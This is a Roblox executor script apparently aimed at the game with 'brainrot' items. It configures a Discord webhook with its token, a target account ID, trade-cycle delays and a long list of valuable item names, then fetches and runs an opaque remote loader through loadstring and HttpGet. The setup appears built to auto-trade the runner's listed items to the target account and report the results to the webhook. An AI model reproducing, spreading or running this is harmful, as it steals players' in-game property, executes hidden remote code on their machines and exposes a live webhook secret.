getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1489374541808533564/pXXgGJRxXPSFP9Zg433DTtdW9ZJbImtN-sZUDOj0MGxw_G0R6lOXZosVsbS3_yJ51hJJ"
getgenv().TARGET_ID = 7197256092
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Puggies"] = true,
    ["Los Spaghettis"] = true,
    ["Los Sekolahs"] = true,
    ["Los Sweethearts"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Los 25"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Combinasionas"] = true,
    ["Los Amigos"] = true,
    ["Los 67"] = true,
    ["Los Tortus"] = true,
    ["La Secret Combinasion"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Rosetti Tualetti"] = true,
    ["Esok Sekolah"] = true,
    ["1x1x1x1"] = true,
    ["67"] = true,
    ["Rang Ring Bus"] = true,
    ["La Ginger Sekolah"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Fishino Clownino"] = true,
    ["Chimnino"] = true,
    ["Cupid Hotspot"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Orcaledon"] = true,
    ["Eviledon"] = true,
    ["Money Money Reindeer"] = true,
    ["Bacuru and Egguru"] = true,
    ["Las Sis"] = true,
    ["Spinny Hammy"] = true,
    ["Chill Puppy"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["La Sahur Combinasion"] = true,
    ["La Grande Combinasion"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Celularcini Viciosini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Headless Horseman"] = true,
    ["Dragon Gingerini"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Rosey and Teddy"] = true,
    ["Cooki and Milki"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Spooky and Pumpky"] = true,
    ["Love Love Bear"] = true,
    ["Ginger Gerat"] = true,
    ["Tralaledon"] = true,
    ["Swag Soda"] = true,
    ["Mariachi Corazoni"] = true,
    ["Guest 666"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["Chipso and Queso"] = true,
    ["La Spooky Grande"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["La Jolly Grande"] = true,
    ["W or L"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["GOAT"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/704e39ff20e64fe482157ac026ab50cc.lua"))()
